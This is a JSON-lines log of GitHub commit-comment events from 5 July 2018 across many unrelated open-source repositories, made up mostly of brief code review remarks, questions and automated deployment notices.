{"id":"7923376217","type":"CommitCommentEvent","actor":{"login":"Ulfgard"},"repo":{"name":"Shark-ML/Shark"},"payload":{"comment":{"id":29606969,"position":110,"line":110,"path":"include/shark/Core/Threading/ThreadPool.h","commit_id":"906ceae2678bd6d4ad7cd8609431988c886514fe","created_at":"2018-07-05T13:54:39Z","updated_at":"2018-07-05T13:54:39Z","author_association":"MEMBER","body":"i think this should be f as we moved from task. aye..."}},"created_at":"2018-07-05T13:54:39Z"}
{"id":"7923376590","type":"CommitCommentEvent","actor":{"login":"kijin"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29606972,"position":157,"line":666,"path":"classes/display/HTMLDisplayHandler.php","commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T13:54:43Z","updated_at":"2018-07-05T13:54:43Z","author_association":"MEMBER","body":"basename()"}},"created_at":"2018-07-05T13:54:43Z"}
{"id":"7923377289","type":"CommitCommentEvent","actor":{"login":"jangarrevoet"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606974,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T13:54:50Z","updated_at":"2018-07-05T13:54:50Z","author_association":"NONE","body":"Thanks will give that a try a do some further testing.\n\n> On 5 Jul 2018, at 15:52, Thomas Kluyver <notifications@github.com> wrote:\n> \n> Just pushed a new commit, now the error should look like this:\n> \n> TypeError: The name parameter is required when specifying a source by path\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/takluyver/h5py/commit/9b38539c1828af1c45ac736fccda907cded65c24#commitcomment-29606934>, or mute the thread <https://github.com/notifications/unsubscribe-auth/APaza70xqS9PH3-wvvmXbR8b3xJPndO3ks5uDhocgaJpZM4VD1MO>.\n> \n\n"}},"created_at":"2018-07-05T13:54:50Z"}
{"id":"7923382355","type":"CommitCommentEvent","actor":{"login":"kijin"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29606979,"position":56,"line":575,"path":"classes/display/HTMLDisplayHandler.php","commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T13:55:40Z","updated_at":"2018-07-05T13:55:40Z","author_association":"MEMBER","body":"admin 관련 파일은 모두 admin 모듈에 포함된 레이아웃(?)으로 옮겨버리면 더 깔끔하지 않을까요?"}},"created_at":"2018-07-05T13:55:40Z"}
{"id":"7923390622","type":"CommitCommentEvent","actor":{"login":"Ulfgard"},"repo":{"name":"Shark-ML/Shark"},"payload":{"comment":{"id":29607004,"position":136,"line":136,"path":"include/shark/Core/Threading/ThreadPool.h","commit_id":"906ceae2678bd6d4ad7cd8609431988c886514fe","created_at":"2018-07-05T13:57:03Z","updated_at":"2018-07-05T13:57:03Z","author_association":"MEMBER","body":"should we give this an argument for number of workers that is only used for the first initialization? e.g.\r\nglobalThreadPool(std::size_t numWorkersHint = 0)\r\nif(threadCount == 0){\r\n    static unsigned threadCount = numWorkersHint;\r\n}\r\nif(threadCount == 0){\r\n... as before}"}},"created_at":"2018-07-05T13:57:03Z"}
{"id":"7923393476","type":"CommitCommentEvent","actor":{"login":"Blu3Mercy"},"repo":{"name":"SteveScript/LevelUp-Script-Steam"},"payload":{"comment":{"id":29607007,"position":null,"line":null,"path":null,"commit_id":"f0bde6bf10c632bc5e0ae9178306e7ff13f9aa5d","created_at":"2018-07-05T13:57:31Z","updated_at":"2018-07-05T13:57:31Z","author_association":"NONE","body":"yo bro why did u delete it can u pm me this script\r\n"}},"created_at":"2018-07-05T13:57:31Z"}
{"id":"7923394288","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29607010,"position":null,"line":null,"path":null,"commit_id":"bfeac5c28ddb60531f25d7d99d0299a5161b9a8e","created_at":"2018-07-05T13:57:40Z","updated_at":"2018-07-05T13:57:40Z","author_association":"OWNER","body":"Tag #598"}},"created_at":"2018-07-05T13:57:40Z"}
{"id":"7923395068","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29607016,"position":null,"line":null,"path":null,"commit_id":"3815302230bc043f98667c1ee0de6dee15969034","created_at":"2018-07-05T13:57:47Z","updated_at":"2018-07-05T13:57:47Z","author_association":"OWNER","body":"Tag #598"}},"created_at":"2018-07-05T13:57:47Z"}
{"id":"7923395273","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29607017,"position":81,"line":335,"path":"addons/web/static/tests/views/search_view_tests.js","commit_id":"e999caa0c7362bbfc1f04d7bdd714db31fe18a29","created_at":"2018-07-05T13:57:49Z","updated_at":"2018-07-05T13:57:49Z","author_association":"NONE","body":"to move?"}},"created_at":"2018-07-05T13:57:49Z"}
{"id":"7923400413","type":"CommitCommentEvent","actor":{"login":"motafa1320"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":29607029,"position":null,"line":null,"path":null,"commit_id":"390541f6f5bae393b71f068663394c831822b41e","created_at":"2018-07-05T13:58:38Z","updated_at":"2018-07-05T13:58:38Z","author_association":"NONE","body":"Hi\r\nMy name is davoud vakili.\r\nWhere is block sending messge me?"}},"created_at":"2018-07-05T13:58:38Z"}
{"id":"7923407006","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29607044,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-05T13:59:42Z","updated_at":"2018-07-05T13:59:42Z","author_association":"CONTRIBUTOR","body":"Ur mixing mechanics and spell aura ids, those work differently as of right now.\r\n\r\n@cala i know it might not be how it should work, but for now its something. Immunities are something me and WB are eyeing a lot but there is a lot of other crap too."}},"created_at":"2018-07-05T13:59:42Z"}
{"id":"7923416411","type":"CommitCommentEvent","actor":{"login":"zalyotov"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29607057,"position":256,"line":82,"path":"index.php","commit_id":"87964724f28aeb0e889c5d1d55a14c7df2fba49c","created_at":"2018-07-05T14:01:14Z","updated_at":"2018-07-05T14:01:14Z","author_association":"NONE","body":"$catName отсутствует"}},"created_at":"2018-07-05T14:01:14Z"}
{"id":"7923418811","type":"CommitCommentEvent","actor":{"login":"pgleeson"},"repo":{"name":"LEMS/jLEMS"},"payload":{"comment":{"id":29607066,"position":18,"line":18,"path":"src/test/java/org/lemsml/jlems/test/URLInclusionReaderTest.java","commit_id":"b63da4d3b7aa1efd48c163ed374104b93925286d","created_at":"2018-07-05T14:01:38Z","updated_at":"2018-07-05T14:01:38Z","author_association":"MEMBER","body":"Thanks. Suggestions in #89 fixed it."}},"created_at":"2018-07-05T14:01:38Z"}
{"id":"7923420722","type":"CommitCommentEvent","actor":{"login":"adr-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29607069,"position":null,"line":null,"path":null,"commit_id":"fd4565f14a197784237014b263e4af7c1a3e925e","created_at":"2018-07-05T14:01:56Z","updated_at":"2018-07-05T14:01:56Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-05T14:01:56Z"}
{"id":"7923421426","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29607070,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T14:02:03Z","updated_at":"2018-07-05T14:02:03Z","author_association":"OWNER","body":"Adjustments to the visual centre of the brain for the blind\r\nAdjustments to the senses for sensory space travel messages and transportation telescopic speed of vision translated"}},"created_at":"2018-07-05T14:02:03Z"}
{"id":"7923434742","type":"CommitCommentEvent","actor":{"login":"elwazana"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29607089,"position":null,"line":null,"path":null,"commit_id":"c3654874044223057570967df051e04ee9e5d95b","created_at":"2018-07-05T14:04:11Z","updated_at":"2018-07-05T14:04:11Z","author_association":"COLLABORATOR","body":"@szymczdm Hello Dan, Should I note down the descriptions that lost information as I did here (#746 ) for the NoPCM stable update?"}},"created_at":"2018-07-05T14:04:11Z"}
{"id":"7923435159","type":"CommitCommentEvent","actor":{"login":"bluesky139"},"repo":{"name":"bluesky139/LTweaks"},"payload":{"comment":{"id":29607091,"position":null,"line":null,"path":null,"commit_id":"25255aac448ff909368e7bd07e8b91e6df71b460","created_at":"2018-07-05T14:04:15Z","updated_at":"2018-07-05T14:04:15Z","author_association":"OWNER","body":"明后天发布，改了后又忙别的去了。。"}},"created_at":"2018-07-05T14:04:15Z"}
{"id":"7923437948","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29607097,"position":null,"line":null,"path":null,"commit_id":"c1b8433e3e6b76316eae97b98e6a37c32e12bb2e","created_at":"2018-07-05T14:04:43Z","updated_at":"2018-07-05T14:04:43Z","author_association":"MEMBER","body":"@diversys, I did most revbumps:\r\n\r\nRecipe | Revbump done? | Outcome\r\n--- | --- | ---\r\n`libx11-1.6.5.recipe` | yes | builds are OK\r\n`libxpm-3.5.11.recipe` | yes | builds are OK\r\n`libxpm-3.5.12.recipe` | yes | builds are OK\r\n`retext-7.0.1.recipe` | no | revbump does not seem to be required\r\n`libfm_qt-0.13.0.recipe` | yes | build is OK on x86_64, but KO on x86 second arch\r\n`pcmanfm_qt-0.13.0.recipe` | yes | builds are KO on both x86_64 and x86 second arch\r\n\r\nShall I push a revbump for LibreOffice too?\r\nOr would you like to do it yourself?\r\n(I'm asking this in case you have work on your side that you would like to push.)"}},"created_at":"2018-07-05T14:04:43Z"}
{"id":"7923439934","type":"CommitCommentEvent","actor":{"login":"rahulsnair"},"repo":{"name":"deivesj/android_device_motorola_albus"},"payload":{"comment":{"id":29607102,"position":null,"line":null,"path":null,"commit_id":"84302adeb00f41c0e009b732f905acf305b6c4e3","created_at":"2018-07-05T14:05:02Z","updated_at":"2018-07-05T14:05:02Z","author_association":"NONE","body":"Instead on kanging why don't you preserve commit history.."}},"created_at":"2018-07-05T14:05:02Z"}
{"id":"7923441532","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29607108,"position":null,"line":null,"path":null,"commit_id":"436a6828b604069b6fabf01228abd5cad5bb89d8","created_at":"2018-07-05T14:05:17Z","updated_at":"2018-07-05T14:05:17Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T14:05:17Z"}
{"id":"7923451942","type":"CommitCommentEvent","actor":{"login":"pedrofracassi"},"repo":{"name":"SwitchbladeBot/switchblade"},"payload":{"comment":{"id":29607133,"position":19,"line":24,"path":"src/utils/Constants.js","commit_id":"e8e61a5605ffafe7652d0494a0f82f4335a54aa8","created_at":"2018-07-05T14:06:57Z","updated_at":"2018-07-05T14:06:57Z","author_association":"MEMBER","body":"Why remove the assets?"}},"created_at":"2018-07-05T14:06:57Z"}
{"id":"7923456422","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"php/web-qa"},"payload":{"comment":{"id":29607139,"position":null,"line":null,"path":null,"commit_id":"2360eb3fb48a797cbe2ded5abcd0e4cbc5d5f777","created_at":"2018-07-05T14:07:41Z","updated_at":"2018-07-05T14:07:41Z","author_association":"NONE","body":"Why not?"}},"created_at":"2018-07-05T14:07:41Z"}
{"id":"7923458127","type":"CommitCommentEvent","actor":{"login":"Gustry"},"repo":{"name":"enricofer/go2mapillary"},"payload":{"comment":{"id":29607144,"position":4,"line":26,"path":"mapillary_coverage.py","commit_id":"c66bb567b3f229131d4c6a073696dea732753744","created_at":"2018-07-05T14:07:58Z","updated_at":"2018-07-05T14:07:58Z","author_association":"NONE","body":"To avoid renaming and possible conflicts with other plugin, I usually do something like:\r\n`from go2mapillary.extlibs import mapbox_vector_tile` so I'm sure that the package is coming from my plugin.\r\n\r\nMy 2 cents. Thanks for your fix!"}},"created_at":"2018-07-05T14:07:58Z"}
{"id":"7923466194","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29607161,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T14:09:18Z","updated_at":"2018-07-05T14:09:18Z","author_association":"OWNER","body":"OPS optic propulsion systems"}},"created_at":"2018-07-05T14:09:18Z"}
{"id":"7923468463","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29607164,"position":null,"line":null,"path":null,"commit_id":"c5f5bd2f93e05d223e902c90b221b73aaee8c925","created_at":"2018-07-05T14:09:41Z","updated_at":"2018-07-05T14:09:41Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [016 - Desenvolver Classe Cep Service](https://trello.com/c/HUNPh9Sn/21-016-desenvolver-classe-cep-service)"}},"created_at":"2018-07-05T14:09:41Z"}
{"id":"7923475985","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29607180,"position":null,"line":null,"path":null,"commit_id":"908317b8c8b9180edccbae9871b6ad8821019f3d","created_at":"2018-07-05T14:10:55Z","updated_at":"2018-07-05T14:10:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-707](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-707).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-707-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T14:10:55Z"}
{"id":"7923476987","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"php/web-qa"},"payload":{"comment":{"id":29607184,"position":null,"line":null,"path":null,"commit_id":"2360eb3fb48a797cbe2ded5abcd0e4cbc5d5f777","created_at":"2018-07-05T14:11:04Z","updated_at":"2018-07-05T14:11:04Z","author_association":"CONTRIBUTOR","body":"Because Joe haven't yet tag it, and haven't uploaded the new tarball anywhere, and MS haven't run the builds. So this fix some broken links on QA page"}},"created_at":"2018-07-05T14:11:04Z"}
{"id":"7923478304","type":"CommitCommentEvent","actor":{"login":"SHsmallpea"},"repo":{"name":"SHsmallpea/web"},"payload":{"comment":{"id":29607191,"position":1,"line":1,"path":"index.html","commit_id":"34c4087b39ebc9e917e13363447bb9d3caef496f","created_at":"2018-07-05T14:11:16Z","updated_at":"2018-07-05T14:11:16Z","author_association":"OWNER","body":"\r\n<!DOCTYPE html>\r\n--\r\n  | <html lang=\"zh-CN\">\r\n  | <head>\r\n  | <meta charset=\"UTF-8\">\r\n  | <link rel=\"canonical\" href=\"https://blog.csdn.net/u014756827/article/details/52539756\"/>\r\n  | <meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">\r\n  | <meta name=\"renderer\" content=\"webkit\"/>\r\n  | <meta name=\"force-rendering\" content=\"webkit\"/>\r\n  | <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"/>\r\n  | <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no\">\r\n  | <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black\">\r\n  | <meta name=\"referrer\" content=\"always\">\r\n  | <meta name=\"description\" content=\"这两天用了Github建立了自己的个人主页， 网址为 hyman1994.com。 感兴趣的朋友可以访问一下，欢迎您的指导意见和建议！\r\n  |  \r\n  |  \r\n  | 流程总结：\r\n  |  \r\n  |  \r\n  | 1.注册自己的github账户,名为XXX\r\n  | 2.创建一个名为XXX.github.io的库\r\n  | 3.我觉得挺重要的一步:\r\n  | 看了很多博客说建了库之后，只要等待生成就可以了，然后访问 XXX.github.io 就到了自己的主页了。 \" />\r\n\r\n"}},"created_at":"2018-07-05T14:11:16Z"}
{"id":"7923480490","type":"CommitCommentEvent","actor":{"login":"Soltac"},"repo":{"name":"bhrugen90/Tangy"},"payload":{"comment":{"id":29607194,"position":null,"line":null,"path":null,"commit_id":"19587f0ff77dabf4784428cf4122900771dff3e4","created_at":"2018-07-05T14:11:37Z","updated_at":"2018-07-05T14:11:37Z","author_association":"NONE","body":"Hello,\r\nI have a problem about the price.\r\nWhen I try to post a price with a dot a comma it return me that the ModelState is Invalid.\r\nThe Error message is : \r\n\"The value '2.99' is not valid for Price\" \r\nI compared our codes and I didn't see any difference.\r\n\r\nI would like to add that your tutorial videos are really good "}},"created_at":"2018-07-05T14:11:37Z"}
{"id":"7923484817","type":"CommitCommentEvent","actor":{"login":"VidyasagarMSC"},"repo":{"name":"VidyasagarMSC/cloudco-insurance-bot"},"payload":{"comment":{"id":29607199,"position":null,"line":null,"path":null,"commit_id":"7925897b6056992ebba28691291e7667e7e45e5d","created_at":"2018-07-05T14:12:18Z","updated_at":"2018-07-05T14:12:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/6fbc7a48-a08d-4d4d-ace7-cb823c753512?env_id=ibm%3Ayp%3Aeu-de \"CloudCo\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/0eb57583-e6a6-4415-8ed2-7e12e1803f7c?env_id=ibm%3Ayp%3Aeu-de \"bot (master)\") deployed [cloudco-insurance-bot](https://github.com/VidyasagarMSC/cloudco-insurance-bot/releases/tag/deploy-ibm-yp-eu-de-vidyasagar.msc-in.ibm.com-Demo-20180705-141217 \"deploy-ibm-yp-eu-de-vidyasagar.msc-in.ibm.com-Demo-20180705-141217\") to [Demo](https://console.bluemix.net/apps/a68e111e-38a8-485d-add4-d63bd9a837e8?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:vidyasagar.msc@in.ibm.com:Demo\"), including this commit"}},"created_at":"2018-07-05T14:12:18Z"}
{"id":"7923485413","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29607201,"position":null,"line":null,"path":null,"commit_id":"c3654874044223057570967df051e04ee9e5d95b","created_at":"2018-07-05T14:12:24Z","updated_at":"2018-07-05T14:12:24Z","author_association":"COLLABORATOR","body":"Yes please!"}},"created_at":"2018-07-05T14:12:24Z"}
{"id":"7923489258","type":"CommitCommentEvent","actor":{"login":"h476564406"},"repo":{"name":"h476564406/question"},"payload":{"comment":{"id":29607208,"position":null,"line":null,"path":null,"commit_id":"e73e3220d21f0c719b4f6fa072627ead46efcd1c","created_at":"2018-07-05T14:12:59Z","updated_at":"2018-07-05T14:12:59Z","author_association":"OWNER","body":"@algoinfo 是的，用google devtool 的performance发现script src 会强制渲染一波它前面的内容。测试的时候发现如果没有script src ， 同一个node的前后样式会以最后样式为准, 比如背景色前红后绿不会显示红色，只会显示最后的绿色。如果中间用script src隔开同一个node的前后样式， 然后把google devtool 的network调成slow 3G, 会看到样式的前后变化。 先显示红色，后显示绿色。"}},"created_at":"2018-07-05T14:12:59Z"}
{"id":"7923491463","type":"CommitCommentEvent","actor":{"login":"Saillou"},"repo":{"name":"Saillou/EyeTracker"},"payload":{"comment":{"id":29607213,"position":null,"line":null,"path":null,"commit_id":"0c3b0ff8ede1db8661898d886fc3f68eb3f9b9b2","created_at":"2018-07-05T14:13:20Z","updated_at":"2018-07-05T14:13:20Z","author_association":"OWNER","body":"No comment \\(°^°)/"}},"created_at":"2018-07-05T14:13:20Z"}
{"id":"7923499129","type":"CommitCommentEvent","actor":{"login":"remicollet"},"repo":{"name":"php/web-qa"},"payload":{"comment":{"id":29607227,"position":null,"line":null,"path":null,"commit_id":"2360eb3fb48a797cbe2ded5abcd0e4cbc5d5f777","created_at":"2018-07-05T14:14:34Z","updated_at":"2018-07-05T14:14:34Z","author_association":"CONTRIBUTOR","body":"In short, this have been forgotten in b1ccf41dfadf3f9c5bfba061803e52ca6ea76c2c"}},"created_at":"2018-07-05T14:14:34Z"}
{"id":"7923500056","type":"CommitCommentEvent","actor":{"login":"mattnorris"},"repo":{"name":"webex/spark-js-sdk"},"payload":{"comment":{"id":29607229,"position":11,"line":132,"path":"packages/node_modules/@ciscospark/media-engine-webrtc/test/unit/lib/offer-answer.js","commit_id":"ec50b3e38d371be36ae0a575469625800d0183e8","created_at":"2018-07-05T14:14:43Z","updated_at":"2018-07-05T14:14:43Z","author_association":"COLLABORATOR","body":"Is it necessary to set these to `undefined` if you're setting `pc = undefined` below? "}},"created_at":"2018-07-05T14:14:43Z"}
{"id":"7923506117","type":"CommitCommentEvent","actor":{"login":"Dwedit"},"repo":{"name":"libretro/RetroArch"},"payload":{"comment":{"id":29607243,"position":null,"line":null,"path":null,"commit_id":"71086283691f0247459df827de41de472a4874a2","created_at":"2018-07-05T14:15:40Z","updated_at":"2018-07-05T14:15:40Z","author_association":"CONTRIBUTOR","body":"Would it work if the message loop call was relocated to just before the call to `video_driver_get_status`?"}},"created_at":"2018-07-05T14:15:40Z"}
{"id":"7923508994","type":"CommitCommentEvent","actor":{"login":"leomanancial"},"repo":{"name":"leomanancial/KidsMananger"},"payload":{"comment":{"id":29607247,"position":null,"line":null,"path":null,"commit_id":"1e01ab13bc0c46ce3e58721a13d23a3b43072f49","created_at":"2018-07-05T14:16:08Z","updated_at":"2018-07-05T14:16:08Z","author_association":"OWNER","body":"welcome"}},"created_at":"2018-07-05T14:16:08Z"}
{"id":"7923510945","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607251,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:16:25Z","updated_at":"2018-07-05T14:16:25Z","author_association":"NONE","body":"Ага - всю папку .idea - в гитгнор"}},"created_at":"2018-07-05T14:16:25Z"}
{"id":"7923514365","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"PrimeGamesDevTeam/VPNGuard"},"payload":{"comment":{"id":29607256,"position":null,"line":null,"path":null,"commit_id":"a2e946b6895a694b37bf1d3588a6d222d55ce866","created_at":"2018-07-05T14:16:57Z","updated_at":"2018-07-05T14:16:57Z","author_association":"NONE","body":"@95CivicSi \r\nthanks for your reply\r\nis it possible for you to do it because I do not know how to do it"}},"created_at":"2018-07-05T14:16:57Z"}
{"id":"7923514524","type":"CommitCommentEvent","actor":{"login":"pbsds"},"repo":{"name":"WORD559/Hatenatools"},"payload":{"comment":{"id":29607257,"position":null,"line":null,"path":null,"commit_id":"17085f316b1f2fceaa23a6e2cc8dc4e28bb3d6f8","created_at":"2018-07-05T14:16:59Z","updated_at":"2018-07-05T14:16:59Z","author_association":"NONE","body":"When i wrote the flipnote player, i used statistics to find the framerate of each speed.\r\nThese are the values i arrived at which produced the best looping:\r\nhttps://github.com/pbsds/Flipnote-Player/blob/master/Flipnote%20Player.py#L92"}},"created_at":"2018-07-05T14:16:59Z"}
{"id":"7923518328","type":"CommitCommentEvent","actor":{"login":"DigitalPlatform"},"repo":{"name":"DigitalPlatform/chord"},"payload":{"comment":{"id":29607261,"position":null,"line":null,"path":null,"commit_id":"be9ec9596f2677cf3aa7a9f3ef4f0e5ead605a57","created_at":"2018-07-05T14:17:35Z","updated_at":"2018-07-05T14:17:35Z","author_association":"OWNER","body":"应该是 chordInstaller"}},"created_at":"2018-07-05T14:17:35Z"}
{"id":"7923518822","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29607262,"position":22,"line":22,"path":"quiz/build.gradle","commit_id":"b35c9975725980d032e4237b7fe1b56c041be187","created_at":"2018-07-05T14:17:39Z","updated_at":"2018-07-05T14:17:39Z","author_association":"NONE","body":"`compile \"org.springframework:spring-context:${springVersion}\"` можно писать"}},"created_at":"2018-07-05T14:17:39Z"}
{"id":"7923520521","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29607266,"position":null,"line":null,"path":null,"commit_id":"d11d49c39c19b47d324a4b39890cb55fe8e96bcc","created_at":"2018-07-05T14:17:55Z","updated_at":"2018-07-05T14:17:55Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T14:17:55Z"}
{"id":"7923527492","type":"CommitCommentEvent","actor":{"login":"Rastafouille"},"repo":{"name":"Rastafouille/BeeDetection"},"payload":{"comment":{"id":29607282,"position":null,"line":null,"path":null,"commit_id":"b077ed4eab9509971e25a123339a596b5a30ef5d","created_at":"2018-07-05T14:19:04Z","updated_at":"2018-07-05T14:19:04Z","author_association":"OWNER","body":"oui, elles font des vas est viens devant la ruche avant de rentrer, en plus je veux différencier celles qui rentrent de celles qui sortent. Pour le [pollen](https://www.google.fr/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwiM5Yquk4jcAhXI7RQKHQJbAfoQjRx6BAgBEAU&url=http%3A%2F%2Fpassion-apiculture.over-blog.com%2Farticle-les-rentrees-de-pollen-69670781.html&psig=AOvVaw0vFD_kMyFUMLLjRqkQaOR2&ust=1530886652976895) et [varroa](https://www.google.fr/imgres?imgurl=http%3A%2F%2Fwww.apiculteur.ch%2Fimages%2Fvarroa_abeille01.jpg&imgrefurl=http%3A%2F%2Fwww.apiculteur.ch%2Fles-abeilles%2Fvarroa-destructor.html&docid=6FUJ4qzL1WqZFM&tbnid=OJj-4njaO56EPM%3A&vet=10ahUKEwjx9d2Ok4jcAhXEe8AKHUjPCLgQMwgzKAAwAA..i&w=300&h=200&bih=1058&biw=1920&q=varroa&ved=0ahUKEwjx9d2Ok4jcAhXEe8AKHUjPCLgQMwgzKAAwAA&iact=mrc&uact=8), direct sur l'abeille sans les compter plusieurs fois donc l'idée c'est de les tracker et de travaille sur plusieurs images de la même abeille. \r\n\r\n"}},"created_at":"2018-07-05T14:19:04Z"}
{"id":"7923531365","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29607292,"position":null,"line":null,"path":null,"commit_id":"dbcf2a6f2cfbee74e4461ca37ecf905d8bbf8541","created_at":"2018-07-05T14:19:41Z","updated_at":"2018-07-05T14:19:41Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-5](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-5) for d8train."}},"created_at":"2018-07-05T14:19:41Z"}
{"id":"7923532736","type":"CommitCommentEvent","actor":{"login":"rmac19676rmac"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29607299,"position":5,"line":71,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"b1c2ccba98a58f77d332529c07d95ccfba083224","created_at":"2018-07-05T14:19:55Z","updated_at":"2018-07-05T14:19:55Z","author_association":"NONE","body":"because that is the layout java code for the arraylists, specifies the variable fields in the array list\n\nThank You,\nRobert Macrini\nrmacrini@comcast.net\n(203) 488-1983\n(203) 780-1191\n\n> On July 5, 2018 at 12:56 AM cranky98 <notifications@github.com> wrote:\n> \n> \n>     why we use currentWord here?\n> \n>     —\n>     You are receiving this because you commented.\n>     Reply to this email directly, view it on GitHub https://github.com/udacity/ud839_Miwok/commit/b1c2ccba98a58f77d332529c07d95ccfba083224#commitcomment-29601415 , or mute the thread https://github.com/notifications/unsubscribe-auth/Ag-sxtpVosl0PzHJspQjU3Hrg8Kk9Smlks5uDZxugaJpZM4JJJey .\n> \n"}},"created_at":"2018-07-05T14:19:55Z"}
{"id":"7923533454","type":"CommitCommentEvent","actor":{"login":"4lex4"},"repo":{"name":"4lex4/scantailor-advanced"},"payload":{"comment":{"id":29607300,"position":null,"line":null,"path":null,"commit_id":"3a10c51382a2a00892c2441dbc9d1c4ee62a577e","created_at":"2018-07-05T14:20:02Z","updated_at":"2018-07-05T14:20:02Z","author_association":"OWNER","body":"Close #28 "}},"created_at":"2018-07-05T14:20:02Z"}
{"id":"7923533830","type":"CommitCommentEvent","actor":{"login":"bianlaotou"},"repo":{"name":"bianlaotou/Ja"},"payload":{"comment":{"id":29607302,"position":null,"line":null,"path":null,"commit_id":"ebed114e0648a68ad383820959d6cf409fcd2c88","created_at":"2018-07-05T14:20:06Z","updated_at":"2018-07-05T14:20:06Z","author_association":"OWNER","body":"zzz"}},"created_at":"2018-07-05T14:20:06Z"}
